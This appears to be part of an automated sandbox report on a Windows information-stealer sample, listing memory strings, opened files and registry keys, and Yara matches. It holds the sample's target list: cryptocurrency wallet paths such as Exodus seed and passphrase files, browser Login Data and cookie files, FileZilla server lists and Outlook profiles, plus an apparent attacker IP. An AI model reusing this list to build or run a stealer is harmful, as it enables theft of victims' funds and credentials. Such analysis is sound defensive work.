Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.000000000203D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 81.77rs\user\AppData\Roaming\\Coinomi\Coinomi\wallets\\*.*n
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.000000000203D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 77.91.77.81\user\AppData\Roaming\MultiDoge\multidoge.wallet
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: Yara match File source: Process Memory Space: ukuWaeRgPR.exe PID: 6340, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.a3b2c9311b.exe.60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.2767076722.0000000000061000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2169837942.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2171110129.0000000001FEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2770510086.00000000012DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ukuWaeRgPR.exe PID: 6340, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: a3b2c9311b.exe PID: 3448, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.a3b2c9311b.exe.60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.2767076722.0000000000061000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2169837942.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ukuWaeRgPR.exe PID: 6340, type: MEMORYSTR